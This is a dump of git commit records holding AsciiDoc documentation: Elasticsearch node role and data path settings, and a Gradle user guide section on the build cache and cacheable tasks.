The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","old_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. 
A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master node.\n\nAny master-eligible node (all nodes by default) may be elected to become the\nmaster node by the <<modules-discovery-zen,master election process>>.\n\nIMPORTANT: Master nodes must have access to the `data\/` directory (just like\n`data` nodes) as this is where the cluster state is persisted between node restarts.\n\nIndexing and searching your data is CPU-, memory-, and I\/O-intensive work\nwhich can put pressure on a node's resources. To ensure that your master\nnode is stable and not under pressure, it is a good idea in a bigger\ncluster to split the roles between dedicated master-eligible nodes and\ndedicated data nodes.\n\nWhile master nodes can also behave as <<coordinating-node,coordinating nodes>>\nand route search and indexing requests from clients to data nodes, it is\nbetter _not_ to use dedicated master nodes for this purpose. It is important\nfor the stability of the cluster that master-eligible nodes do as little work\nas possible.\n\nTo create a dedicated master-eligible node, set:\n\n[source,yaml]\n-------------------\nnode.master: true <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> The `node.master` role is enabled by default.\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated master-eligible node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n\n[float]\n[[split-brain]]\n==== Avoiding split brain with `minimum_master_nodes`\n\nTo prevent data loss, it is vital to configure the\n`discovery.zen.minimum_master_nodes` setting (which defaults to `1`) so that\neach master-eligible node knows the _minimum number of master-eligible nodes_\nthat must be visible in order to form a cluster.\n\nTo explain, imagine that you have a cluster consisting of two master-eligible\nnodes. A network failure breaks communication between these two nodes. Each\nnode sees one master-eligible node... itself. With `minimum_master_nodes` set\nto the default of `1`, this is sufficient to form a cluster. 
Each node elects\nitself as the new master (thinking that the other master-eligible node has\ndied) and the result is two clusters, or a _split brain_. These two nodes\nwill never rejoin until one node is restarted. Any data that has been written\nto the restarted node will be lost.\n\nNow imagine that you have a cluster with three master-eligible nodes, and\n`minimum_master_nodes` set to `2`. If a network split separates one node from\nthe other two nodes, the side with one node cannot see enough master-eligible\nnodes and will realise that it cannot elect itself as master. The side with\ntwo nodes will elect a new master (if needed) and continue functioning\ncorrectly. As soon as the network split is resolved, the single node will\nrejoin the cluster and start serving requests again.\n\nThis setting should be set to a _quorum_ of master-eligible nodes:\n\n (master_eligible_nodes \/ 2) + 1\n\nIn other words, if there are three master-eligible nodes, then minimum master\nnodes should be set to `(3 \/ 2) + 1` or `2`:\n\n[source,yaml]\n----------------------------\ndiscovery.zen.minimum_master_nodes: 2 <1>\n----------------------------\n<1> Defaults to `1`.\n\nThis setting can also be changed dynamically on a live cluster with the\n<<cluster-update-settings,cluster update settings API>>:\n\n[source,js]\n----------------------------\nPUT _cluster\/settings\n{\n \"transient\": {\n \"discovery.zen.minimum_master_nodes\": 2\n }\n}\n----------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:\/cannot set discovery.zen.minimum_master_nodes to more than the current master nodes\/]\n\nTIP: An advantage of splitting the master and data roles between dedicated\nnodes is that you can have just three master-eligible nodes and set\n`minimum_master_nodes` to `2`. You never have to change this setting, no\nmatter how many dedicated data nodes you add to the cluster.\n\n\n[float]\n[[data-node]]\n=== Data Node\n\nData nodes hold the shards that contain the documents you have indexed. Data\nnodes handle data related operations like CRUD, search, and aggregations.\nThese operations are I\/O-, memory-, and CPU-intensive. It is important to\nmonitor these resources and to add more data nodes if they are overloaded.\n\nThe main benefit of having dedicated data nodes is the separation of the\nmaster and data roles.\n\nTo create a dedicated data node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: true <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> The `node.data` role is enabled by default.\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated data node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[node-ingest-node]]\n=== Ingest Node\n\nIngest nodes can execute pre-processing pipelines, composed of one or more\ningest processors. 
Depending on the type of operations performed by the ingest\nprocessors and the required resources, it may make sense to have dedicated\ningest nodes that will only perform this specific task.\n\nTo create a dedicated ingest node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: true <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> The `node.ingest` role is enabled by default.\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated ingest node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n[[coordinating-only-node]]\n=== Coordinating only node\n\nIf you take away the ability to handle master duties, to hold data,\nand to pre-process documents, then you are left with a _coordinating_ node that\ncan only route requests, handle the search reduce phase, and distribute bulk\nindexing. Essentially, coordinating only nodes behave as smart load balancers.\n\nCoordinating only nodes can benefit large clusters by offloading the\ncoordinating node role from data and master-eligible nodes. They join the\ncluster and receive the full <<cluster-state,cluster state>>, like every other\nnode, and they use the cluster state to route requests directly to the\nappropriate place(s).\n\nWARNING: Adding too many coordinating only nodes to a cluster can increase the\nburden on the entire cluster because the elected master node must await\nacknowledgement of cluster state updates from every node! The benefit of\ncoordinating only nodes should not be overstated -- data nodes can happily\nserve the same purpose.\n\nTo create a dedicated coordinating node, set:\n\n[source,yaml]\n-------------------\nnode.master: false <1>\nnode.data: false <2>\nnode.ingest: false <3>\nsearch.remote.connect: false <4>\n-------------------\n<1> Disable the `node.master` role (enabled by default).\n<2> Disable the `node.data` role (enabled by default).\n<3> Disable the `node.ingest` role (enabled by default).\n<4> Disable cross-cluster search (enabled by default).\n\nifdef::include-xpack[]\nNOTE: These settings apply only when {xpack} is not installed. To create a\ndedicated coordinating node when {xpack} is installed, see <<modules-node-xpack,{xpack} node settings>>.\nendif::include-xpack[]\n\n[float]\n== Node data path settings\n\n[float]\n[[data-path]]\n=== `path.data`\n\nEvery data and master-eligible node requires access to a data directory where\nshards and index and cluster metadata will be stored. The `path.data` defaults\nto `$ES_HOME\/data` but can be configured in the `elasticsearch.yml` config\nfile as an absolute path or a path relative to `$ES_HOME` as follows:\n\n[source,yaml]\n-----------------------\npath.data: \/var\/elasticsearch\/data\n-----------------------\n\nLike all node settings, it can also be specified on the command line as:\n\n[source,sh]\n-----------------------\n.\/bin\/elasticsearch -Epath.data=\/var\/elasticsearch\/data\n-----------------------\n\nTIP: When using the `.zip` or `.tar.gz` distributions, the `path.data` setting\nshould be configured to locate the data directory outside the Elasticsearch\nhome directory, so that the home directory can be deleted without deleting\nyour data! 
The RPM and Debian distributions do this for you already.\n\n\n[float]\n[[max-local-storage-nodes]]\n=== `node.max_local_storage_nodes`\n\nThe <<data-path,data path>> can be shared by multiple nodes, even by nodes from different\nclusters. This is very useful for testing failover and different configurations on your development\nmachine. In production, however, it is recommended to run only one node of Elasticsearch per server.\n\nBy default, Elasticsearch is configured to prevent more than one node from sharing the same data\npath. To allow for more than one node (e.g., on your development machine), use the setting\n`node.max_local_storage_nodes` and set this to a positive integer larger than one.\n\nWARNING: Never run different node types (i.e. master, data) from the same data directory. This can\nlead to unexpected data loss.\n\n[float]\n== Other node settings\n\nMore node settings can be found in <<modules,Modules>>. Of particular note are\nthe <<cluster.name,`cluster.name`>>, the <<node.name,`node.name`>> and the\n<<modules-network,network settings>>.\n\nifdef::include-xpack[]\n:edit_url!:\ninclude::{xes-repo-dir}\/node.asciidoc[]\nendif::include-xpack[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3af1903ba92465072d231f85ba9dfca129463d","subject":"KARAF-4415 - Update the documentation about the verify goal","message":"KARAF-4415 - Update the documentation about the verify goal\n","repos":"grgrzybek\/karaf,grgrzybek\/karaf,grgrzybek\/karaf","old_file":"manual\/src\/main\/asciidoc\/developer-guide\/karaf-maven-plugin.adoc","new_file":"manual\/src\/main\/asciidoc\/developer-guide\/karaf-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32ce5d486d26d8415da4d7966061cc3ee24ff683","subject":"Clarify clean-up of shortest period affects all projects","message":"Clarify clean-up of shortest period affects all projects\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/build-cache\/build_cache.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/build-cache\/build_cache.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[build_cache]]\n= Build Cache\n\nTIP: Want to learn the tips and tricks top engineering teams use to keep builds fast and performant? 
https:\/\/gradle.com\/training\/#build-cache-deep-dive[Register here] for our Build Cache Training.\n\n[[sec:build_cache_intro]]\n== Overview\n\nThe Gradle _build cache_ is a cache mechanism that aims to save time by reusing outputs produced by other builds.\nThe build cache works by storing (locally or remotely) build outputs and allowing builds to fetch these outputs from the cache when it is determined that inputs have not changed, avoiding the expensive work of regenerating them.\n\nThe first feature to use the build cache is _task output caching_.\nEssentially, task output caching leverages the same intelligence as <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> that Gradle uses to avoid work when a previous local build has already produced a set of task outputs.\nBut instead of being limited to the previous build in the same workspace, task output caching allows Gradle to reuse task outputs from any earlier build in any location on the local machine.\nWhen using a shared build cache for task output caching, this even works across developer machines and build agents.\n\nApart from tasks, <<artifact_transforms.adoc#sec:abm_artifact_transforms,artifact transforms>> can also leverage the build cache and re-use their outputs similarly to task output caching.\n\nTIP: For a hands-on approach to learning how to use the build cache, start by reading through the <<build_cache_use_cases.adoc#use_cases_cache,use cases for the build cache>> and the follow-up sections.\nThey cover the different scenarios that caching can improve and include detailed discussions of the caveats you need to be aware of when enabling caching for a build.\n\n[[sec:build_cache_enable]]\n== Enable the Build Cache\n\nBy default, the build cache is not enabled. You can enable the build cache in a couple of ways:\n\nRun with `--build-cache` on the command-line::\nGradle will use the build cache for this build only.\nPut `org.gradle.caching=true` in your `gradle.properties`::\nGradle will try to reuse outputs from previous builds for all builds, unless explicitly disabled with `--no-build-cache`.
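\n\nFor example, enabling the cache permanently is a one-line entry in `gradle.properties` (in the project root or in the Gradle user home):\n\n[source,properties]\n----\norg.gradle.caching=true\n----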
\n\nWhen the build cache is enabled, it will store build outputs in the Gradle user home.\nFor configuring this directory or different kinds of build caches, see <<#sec:build_cache_configure,Configure the Build Cache>>.\n\n[[sec:task_output_caching]]\n== Task Output Caching\n\nBeyond incremental builds described in <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>>, Gradle can save time by reusing outputs from previous executions of a task by matching inputs to the task.\nTask outputs can be reused between builds on one computer or even between builds running on different computers via a build cache.\n\nWe have focused on the use case where users have an organization-wide remote build cache that is populated regularly by continuous integration builds.\nDevelopers and other continuous integration agents should load cache entries from the remote build cache.\nWe expect that developers will not be allowed to populate the remote build cache, and all continuous integration builds populate the build cache after running the `clean` task.\n\nFor your build to play well with task output caching, it must work well with the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> feature.\nFor example, when running your build twice in a row, all tasks with outputs should be `UP-TO-DATE`.\nYou cannot expect faster builds or correct builds if you enable task output caching when this prerequisite is not met.\n\nTask output caching is automatically enabled when you enable the build cache; see <<#sec:build_cache_enable,Enable the Build Cache>>.\n\n[[sec:task_output_caching_example]]\n=== What does it look like\n\nLet us start with a project that uses the Java plugin and has a few Java source files. We run the build the first time.\n\n----\n> gradle --build-cache compileJava\n:compileJava\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nWe see the directory used by the local build cache in the output. Apart from that, the build was the same as without the build cache.\nLet's clean and run the build again.\n\n----\n> gradle clean\n:clean\n\nBUILD SUCCESSFUL\n----\n\n----\n> gradle --build-cache assemble\n:compileJava FROM-CACHE\n:processResources\n:classes\n:jar\n:assemble\n\nBUILD SUCCESSFUL\n----\n\nNow we see that, instead of executing the `:compileJava` task, the outputs of the task have been loaded from the build cache.\nThe other tasks have not been loaded from the build cache since they are not cacheable. This is due to\n`:classes` and `:assemble` being <<more_about_tasks.adoc#sec:lifecycle_tasks,lifecycle tasks>> and `:processResources`\nand `:jar` being Copy-like tasks, which are not cacheable since it is generally faster to execute them.\n\n[[sec:task_output_caching_details]]\n== Cacheable tasks\n\nSince a task describes all of its inputs and outputs, Gradle can compute a _build cache key_ that uniquely defines the task's outputs based on its inputs.\nThat build cache key is used to request previous outputs from a build cache or store new outputs in the build cache.\nIf the previous build outputs have already been stored in the cache by someone else, e.g. 
your continuous integration server or other developers, you can avoid executing most tasks locally.\n\nThe following inputs contribute to the build cache key for a task in the same way that they do for <<more_about_tasks.adoc#sec:how_does_it_work,up-to-date checks>>:\n\n* The task type and its classpath\n* The names of the output properties\n* The names and values of properties annotated as described in <<more_about_tasks.adoc#sec:task_input_output_annotations,the section called \"Custom task types\">>\n* The names and values of properties added by the DSL via link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskInputs.html[TaskInputs]\n* The classpath of the Gradle distribution, buildSrc and plugins\n* The content of the build script when it affects execution of the task\n\nTask types need to opt in to task output caching using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\nNote that link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] is not inherited by subclasses.\nCustom task types are _not_ cacheable by default.
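\n\nAs an illustration, here is a minimal sketch of a custom task type that opts in (the `ChecksumTask` class and its properties are made up for this example, not a built-in type):\n\n[source,groovy]\n----\nimport java.security.MessageDigest\n\n@CacheableTask                           \/\/ opt in to task output caching\nclass ChecksumTask extends DefaultTask {\n    @InputFile\n    @PathSensitive(PathSensitivity.NONE) \/\/ only the file content matters, which keeps outputs relocatable\n    File inputFile\n\n    @OutputFile\n    File outputFile\n\n    @TaskAction\n    void generate() {\n        \/\/ write an MD5 checksum of the input file; identical input bytes yield the same cache key\n        def md5 = MessageDigest.getInstance('MD5')\n        outputFile.text = md5.digest(inputFile.bytes).encodeHex().toString()\n    }\n}\n----\n\nWith the annotations in place, a second build, or another machine sharing the cache, can resolve such a task `FROM-CACHE` instead of re-running it.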
\n\n[[sec:task_output_caching_cacheable_tasks]]\n=== Built-in cacheable tasks\n\nCurrently, the following built-in Gradle tasks are cacheable:\n\n* Java toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Javadoc.html[Javadoc]\n* Groovy toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.compile.GroovyCompile.html[GroovyCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.javadoc.Groovydoc.html[Groovydoc]\n* Scala toolchain:\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaCompile.html[ScalaCompile],\n link:{javadocPath}\/org\/gradle\/language\/scala\/tasks\/PlatformScalaCompile.html[PlatformScalaCompile],\n link:{groovyDslPath}\/org.gradle.api.tasks.scala.ScalaDoc.html[ScalaDoc]\n* Native toolchain:\n link:{javadocPath}\/org\/gradle\/language\/cpp\/tasks\/CppCompile.html[CppCompile],\n link:{javadocPath}\/org\/gradle\/language\/c\/tasks\/CCompile.html[CCompile],\n link:{javadocPath}\/org\/gradle\/language\/swift\/tasks\/SwiftCompile.html[SwiftCompile]\n* Testing:\n link:{groovyDslPath}\/org.gradle.api.tasks.testing.Test.html[Test]\n* Code quality tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Checkstyle.html[Checkstyle],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.CodeNarc.html[CodeNarc],\n link:{groovyDslPath}\/org.gradle.api.plugins.quality.Pmd.html[Pmd]\n* JaCoCo:\n link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html[JacocoReport]\n* Other tasks:\n link:{groovyDslPath}\/org.gradle.api.plugins.antlr.AntlrTask.html[AntlrTask],\n link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins],\n link:{groovyDslPath}\/org.gradle.api.tasks.WriteProperties.html[WriteProperties]\n\nAll other built-in tasks are currently not cacheable.\n\nFor some tasks, like link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] or link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], it usually does not make sense to make them cacheable because Gradle is only copying files from one location to another.\nIt also does not make sense to cache tasks that do not produce outputs or have no task actions.\n\n[[sec:task_output_caching_cacheable_3rd_party]]\n=== Third party plugins\n\nThere are third party plugins that work well with the build cache.\nThe most prominent examples are the https:\/\/developer.android.com\/studio\/releases\/gradle-plugin.html[Android plugin 3.1+] and the https:\/\/blog.gradle.org\/kotlin-build-cache-use[Kotlin plugin 1.2.21+].\nFor other third party plugins, check their documentation to find out whether they support the build cache.\n\n[[sec:task_output_caching_inputs]]\n=== Declaring task inputs and outputs\n\nIt is very important that a cacheable task has a complete picture of its inputs and outputs, so that the results from one build can be safely re-used somewhere else.\n\nMissing task inputs can cause incorrect cache hits, where different results are treated as identical because the same cache key is used by both executions.\nMissing task outputs can cause build failures if Gradle does not completely capture all outputs for a given task.\nWrongly declared task inputs can lead to cache misses, especially when they contain volatile data or absolute paths.\n(See <<more_about_tasks.adoc#sec:task_inputs_outputs,the section called \"Task inputs and outputs\">> on what should be declared as inputs and outputs.)\n\n[NOTE]\n====\nThe task path is _not_ an input to the build cache key.\nThis means that tasks with different task paths can re-use each other's outputs as long as Gradle determines that executing them yields the same result.\n====\n\nIn order to ensure that the inputs and outputs are properly declared, use integration tests (for example using TestKit) to check that a task produces the same outputs for identical inputs and captures all output files for the task.\nWe suggest adding tests to ensure that the task inputs are relocatable, i.e. that the task can be loaded from the cache into a different build directory (see link:{javadocPath}\/org\/gradle\/api\/tasks\/PathSensitive.html[@PathSensitive]).\n\nIn order to handle volatile inputs for your tasks, consider <<more_about_tasks.adoc#sec:configure_input_normalization,configuring input normalization>>.\n\n[[sec:task_output_caching_disabled_by_default]]\n=== Marking tasks as non-cacheable by default\n\nThere are certain tasks that don't benefit from using the build cache.\nOne example is a task that only moves data around the file system, like a `Copy` task.\nYou can signify that a task is not to be cached by adding the `@DisableCachingByDefault` annotation to it.\nYou can also give a human-readable reason for not caching the task by default.\nThe annotation can be used on its own, or together with `@CacheableTask`.\n\n[NOTE]\n====\nThis annotation is only for documenting the reason behind not caching the task by default.\nBuild logic can override this decision via the runtime API (see below).\n====\n\n== Enable caching of non-cacheable tasks\n\nAs we have seen, built-in tasks, or tasks provided by plugins, are cacheable if their class is annotated with the `@CacheableTask` annotation.\nBut what if you want to make a task cacheable when its class is not?\nLet's take a concrete example: your build script uses a generic `NpmTask` task to create a JavaScript bundle by delegating to NPM (and running `npm run bundle`).\nThis process is similar to a complex compilation task, but `NpmTask` is too generic to be cacheable by default: it just takes arguments and runs npm with those arguments.\n\nThe inputs and outputs of this task are simple to figure out.\nThe inputs are the directory containing the JavaScript files, and the NPM configuration files.\nThe output is the bundle file generated by this task.\n\n=== Using annotations\n\nWe create a subclass of the `NpmTask` and use 
<<more_about_tasks.adoc#sec:task_input_output_annotations,annotations to declare the inputs and outputs>>.\n\nWhen possible, it is better to use delegation instead of creating a subclass.\nThat is the case for the built-in `JavaExec`, `Exec`, `Copy` and `Sync` tasks, which have a method on `Project` to do the actual work.\n\nIf you're a modern JavaScript developer, you know that bundling can take quite a long time, and is worth caching.\nTo achieve that, we need to tell Gradle that it's allowed to cache the output of that task, using the link:{javadocPath}\/org\/gradle\/api\/tasks\/CacheableTask.html[@CacheableTask] annotation.\n\nThis is sufficient to make the task cacheable on your own machine.\nHowever, input files are identified by default by their absolute path.\nSo if the cache needs to be shared between several developers or machines using different paths, that won't work as expected.\nSo we also need to set the <<build_cache_concepts.adoc#relocatability,path sensitivity>>.\nIn this case, the relative path of the input files can be used to identify them.\n\nNote that it is possible to override property annotations from the base class by overriding the getter of the base class and annotating that method.\n\n.Custom cacheable BundleTask\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle-task\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n- (1) Add `@CacheableTask` to enable caching for the task.\n- (2) Override the getter of a property of the base class to change the input annotation to `@Internal`.\n- (3) (4) Declare the path sensitivity.\n\n=== Using the runtime API\n\nIf for some reason you cannot create a new custom task class, it is also possible to make a task cacheable using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,runtime API>> to declare the inputs and outputs.\n\nTo enable caching for the task, you need to use the link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#cacheIf-org.gradle.api.specs.Spec-[TaskOutputs.cacheIf()] method.\n\nThe declarations via the runtime API have the same effect as the annotations described above.\nNote that you cannot override file inputs and outputs via the runtime API.\nInput properties can be overridden by specifying the same property name.\n\n.Make the bundle task cacheable\n====\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/groovy\",files=\"build.gradle[tags=bundle-task]\"]\ninclude::sample[dir=\"snippets\/buildCache\/cacheable-bundle\/kotlin\",files=\"build.gradle.kts[tags=bundle-task]\"]\n====\n\n[[sec:build_cache_configure]]\n== Configure the Build Cache\n\nYou can configure the build cache by using the link:{groovyDslPath}\/org.gradle.api.initialization.Settings.html#org.gradle.api.initialization.Settings:buildCache(org.gradle.api.Action)[Settings.buildCache(org.gradle.api.Action)] block in `settings.gradle`.\n\nGradle supports a `local` and a `remote` build cache that can be configured separately.\nWhen both build caches are enabled, Gradle tries to load build outputs from the local build cache first, and then tries the remote build cache if no build outputs are found.\nIf outputs are found in the remote cache, they are also stored in the local cache, so next time they will be found locally.\nGradle stores (\"pushes\") build outputs in any build cache that is enabled and has 
link:{javadocPath}\/org\/gradle\/caching\/configuration\/BuildCache.html#isPush--[BuildCache.isPush()] set to `true`.\n\nBy default, the local build cache has push enabled, and the remote build cache has push disabled.\n\nThe local build cache is pre-configured to be a link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache] and enabled by default.\nThe remote build cache can be configured by specifying the type of build cache to connect to (link:{groovyDslPath}\/org.gradle.caching.configuration.BuildCacheConfiguration.html#org.gradle.caching.configuration.BuildCacheConfiguration:remote(java.lang.Class)[BuildCacheConfiguration.remote(java.lang.Class)]).\n\n[[sec:build_cache_configure_local]]\n=== Built-in local build cache\n\nThe built-in local build cache, link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache], uses a directory to store build cache artifacts.\nBy default, this directory resides in the Gradle user home directory, but its location is configurable.\n\nGradle will periodically clean up the local cache directory by removing entries that have not been used recently to conserve disk space.\nHow often Gradle will perform this clean-up is configurable as shown in the example below.\nNote that cache entries are cleaned up regardless of the project they were produced by.\nIf different projects configure this clean-up to run at different periods, the shortest period will clean up cache entries for all projects.\nTherefore it is recommended to configure this setting globally in the <<init_scripts.adoc#sec:using_an_init_script,init script>>.\nThe <<sec:build_cache_configure_use_cases, Configuration use-cases>> section has an example of putting cache configuration in the init script.\n\nFor more details on the configuration options, refer to the DSL documentation of link:{groovyDslPath}\/org.gradle.caching.local.DirectoryBuildCache.html[DirectoryBuildCache].\nHere is an example of the configuration.\n\n.Configure the local cache\n====\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/groovy\",files=\"settings.gradle[tags=configure-directory-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/configure-built-in-caches\/kotlin\",files=\"settings.gradle.kts[tags=configure-directory-build-cache]\"]\n====\n\n[[sec:build_cache_configure_remote]]\n=== Remote HTTP build cache\n\nlink:{groovyDslPath}\/org.gradle.caching.http.HttpBuildCache.html[HttpBuildCache] provides the ability to read from and write to a remote cache via HTTP.\n\nWith the following configuration, the local build cache will be used for storing build outputs while the local and the remote build cache will be used for retrieving build outputs.\n\n.Load from HttpBuildCache\n====\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/groovy\",files=\"settings.gradle[tags=http-build-cache]\"]\ninclude::sample[dir=\"snippets\/buildCache\/http-build-cache\/kotlin\",files=\"settings.gradle.kts[tags=http-build-cache]\"]\n====\n\nWhen attempting to load an entry, a `GET` request is made to `\\https:\/\/example.com:8123\/cache\/«cache-key»`.\nThe response must have a `2xx` status and the cache entry as the body, or a `404 Not Found` status if the entry does not exist.\n\nWhen attempting to store an entry, a `PUT` request is made to `\\https:\/\/example.com:8123\/cache\/«cache-key»`.\nAny `2xx` response status is interpreted as success.\nA `413 Payload Too Large` response may be returned to indicate that the payload is larger than the server will accept, which will not be treated as an error.
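\n\nAs a quick sketch, the protocol can be exercised with any HTTP client; the URL and file names below are illustrative placeholders:\n\n[source,sh]\n----\n# store an entry (PUT, any 2xx response means success)\ncurl -X PUT --data-binary @entry.bin https:\/\/example.com:8123\/cache\/«cache-key»\n\n# load it back (200 with the entry as the body, or 404 if absent)\ncurl -o entry.bin https:\/\/example.com:8123\/cache\/«cache-key»\n----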
